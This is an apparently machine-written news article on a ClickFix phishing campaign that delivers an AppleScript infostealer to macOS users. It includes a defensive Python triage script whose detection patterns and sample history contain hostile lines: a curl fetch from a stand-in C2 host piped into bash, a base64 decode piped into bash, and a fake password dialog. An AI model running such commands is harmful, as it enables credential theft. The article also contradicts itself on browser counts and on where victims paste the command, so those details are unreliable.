Ethical Hacking News
A sophisticated phishing campaign targeting macOS users has been discovered, utilizing social engineering tactics to trick individuals into divulging sensitive information such as user credentials and live session cookies. Apple has taken steps to address this issue by including a new feature in the latest versions of macOS Tahoe (26.4) or macOS Sequoia. However, users are still vulnerable if they run an older OS version or ignore the macOS warning. This phishing campaign highlights the importance of staying vigilant against social engineering tactics and taking proactive steps to protect oneself.
Cybersecurity experts have discovered a sophisticated phishing campaign targeting macOS users using the ClickFix social engineering tactic. The attackers collect sensitive information such as user credentials, browser session cookies, and data from browser extensions. The campaign primarily affects finance sector users in Asia and utilizes fake CAPTCHA prompts and cleverly crafted messages to manipulate victims into divulging their login credentials. Apple has included a new feature in macOS Tahoe (26.4) or Sequoia that alerts users when they attempt to paste potentially malicious commands, providing an additional layer of protection against ClickFix attacks. The malware targets user passwords and collects data from 12 Chromium-based browsers, as well as cryptocurrency wallets and password manager credentials.
Cybersecurity experts have recently discovered a sophisticated phishing campaign targeting macOS users, utilizing the infamous social engineering tactic known as ClickFix to trick individuals into executing malicious commands on their own computers. The attackers have been using AppleScript-based infostealers to collect sensitive information such as user credentials, live session cookies from 14 browsers, and data from over 200 browser extensions.
The campaign, which has been observed in Asia and primarily affects users in the finance sector, utilizes a combination of fake CAPTCHA prompts and cleverly crafted social engineering messages to manipulate victims into divulging their login credentials. Once executed, the malware downloads a malicious script that captures user information and sends it to an attacker-controlled server.
According to Netskope Threat Labs researcher Jan Michael Alcantara, the team initially observed this campaign last month and has seen similar instances as recently as last week. The attackers have also been using client-side JavaScript to filter victims by user-agent, ignoring mobile devices and directing desktop users to either a Windows or macOS-specific payload.
The fake CAPTCHA prompts the user to open Spotlight on their Mac, and then paste a "verification code" into the search feature. Once the victim hits Enter and executes the command, it silently downloads a malicious script from the attacker-controlled server. The script collects the victim's username, hardcodes the command-and-control (C2) server address, and creates a temporary directory at /tmp/xdivcmp/ to stage all of the stolen data before sending it to the C2.
Apple has taken steps to address this issue by including a new feature in the latest versions of macOS Tahoe (26.4) or macOS Sequoia. This feature alerts users when they attempt to paste potentially malicious commands into the Terminal application, providing an additional layer of protection against ClickFix attacks.
However, if a user is running an older OS version or for some reason ignores the macOS warning and clicks the "paste anyway" option, the malware moves on to the credential-harvesting stage. It then deploys a sneaky social engineering dialog box that loads the authentic macOS system lock icon from local resources. Users see the lock, think it's a legit Apple dialog box, and then enter their system password.
The malware takes extreme measures to force credential entry. There is only one action button, with no option for users to close the dialog box window. The dialog box keeps reappearing until the victim enters a valid password. User passwords are validated in real-time using macOS's directory services authentication, and if incorrect, the dialog box reappears, continuing the loop until the person provides a correct password.
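The infection chain described above (a pasted one-liner that fetches a script, a staging directory at /tmp/xdivcmp/, and an AppleScript password dialog backed by directory-services authentication) leaves traces in a user's shell history and in command-line audit records. The following triage helper, written for this article and not part of Netskope's or anyone else's tooling, scores such records against those indicators. The sample history lines are constructed; the weights and regexes are heuristics chosen for this example, and the `dscl -authonly` signature assumes that is the directory-services check the article refers to without naming it.

```python
"""Hypothetical ClickFix triage helper for macOS hosts (example code written
for this article, not the researchers' tooling).

It scores shell-history or command-line audit lines for indicators of the
ClickFix chain: remote scripts piped into a shell, base64-decoded payloads,
AppleScript password dialogs, directory-services password validation, and the
/tmp/xdivcmp staging directory named in the report."""
import os
import re
from dataclasses import dataclass, field

# Staging directory named in the article.
STAGING_DIR = "/tmp/xdivcmp"

# (name, pattern, weight). Weights and patterns are heuristics for this example.
INDICATORS = [
    ("remote_script_to_shell", re.compile(r"curl\s+[^|]*\|\s*(ba|z)?sh\b"), 3),
    ("base64_decode_to_shell", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z)?sh\b"), 3),
    ("osascript_dialog", re.compile(r"osascript\b.*display dialog"), 2),
    ("hidden_answer_prompt", re.compile(r"with hidden answer"), 2),
    # Assumption: the "directory services authentication" in the article is
    # dscl's -authonly check; the article does not name the command.
    ("dscl_authonly", re.compile(r"dscl\b.*-authonly"), 3),
    ("staging_dir", re.compile(re.escape(STAGING_DIR)), 4),
]


@dataclass
class Finding:
    line_no: int
    line: str
    hits: list = field(default_factory=list)
    score: int = 0


def scan_lines(lines, threshold=3):
    """Return one Finding per line whose summed indicator weight meets threshold."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(line)]
        score = sum(weight for _, weight in hits)
        if score >= threshold:
            findings.append(Finding(line_no, line, [name for name, _ in hits], score))
    return findings


def staging_dir_present(path=STAGING_DIR):
    """Host check: does the staging directory from the report exist right now?"""
    return os.path.isdir(path)


# Constructed sample shell history: two benign lines, four that mimic the
# chain, then two benign lines (one a plain curl download with no pipe to sh).
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git pull",
    "echo aGVsbG8= | base64 -d | bash",            # 'aGVsbG8=' is just 'hello'
    "curl -fsSL http://c2.invalid/s.sh | bash",
    "osascript -e 'display dialog \"Verify\" with hidden answer'",
    "mkdir -p /tmp/xdivcmp/",
    "curl -O https://example.invalid/a.tgz",
    "brew update",
]


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_HISTORY):
        print(f"line {f.line_no} score={f.score} {f.hits}: {f.line}")
    print("staging dir present:", staging_dir_present())
```

On a real host the input would be `~/.zsh_history` or `~/.bash_history` (or the `command` field of an EDR event), and the threshold keeps a lone `curl -O` download or a stray `osascript` call from firing on its own; the staging-directory path and the base64-or-curl-into-shell patterns are weighted so that a single occurrence is enough to warrant a look.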
In addition to collecting user credentials, the stealer also targets 12 Chromium-based browsers: Chrome, Brave, Edge, Vivaldi, Opera, Opera GX, Chrome Beta, Chrome Canary, Chromium, Chrome Dev, Arc, and CocCoc. For each of these, it searches user profiles and steals session tokens, authentication cookies, saved passwords, and other autofill information including credit card numbers.
Furthermore, the malware is configured to swipe details from cryptocurrency wallets such as MetaMask, Phantom, Coinbase Wallet, Trust Wallet, and dozens of blockchain-specific ones. It also collects password manager credentials from LastPass, 1Password, Dashlane, Bitwarden, two-factor authentication apps including Authy and Google Authenticator extensions, and various VPN and single sign-on extensions used for corporate access.
This sophisticated phishing campaign highlights the importance of staying vigilant against social engineering tactics. As attackers continue to evolve their methods, it is essential for users to remain aware of these risks and take proactive steps to protect themselves. By keeping their operating systems up-to-date, utilizing reputable antivirus software, and exercising caution when interacting with suspicious emails or prompts, individuals can significantly reduce the risk of falling victim to this type of attack.
In conclusion, the ClickFix phishing campaign is a stark reminder of the evolving nature of cybersecurity threats. As attackers continue to push the boundaries of what is possible, it is crucial for users and organizations alike to remain proactive in protecting themselves against these types of attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Sophisticated-Phishing-Campaign-Targets-macOS-Users-Exploiting-ClickFix-Social-Engineering-Tactic-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/04/21/macos_clickfix_attacks_deliver_applescript/
https://www.theregister.com/2026/04/21/macos_clickfix_attacks_deliver_applescript/
https://www.bitdefender.com/en-us/blog/hotforsecurity/the-clickfix-scam-infect-your-own-mac
Published: Tue Apr 21 12:23:27 2026 by llama3.2 3B Q4_K_M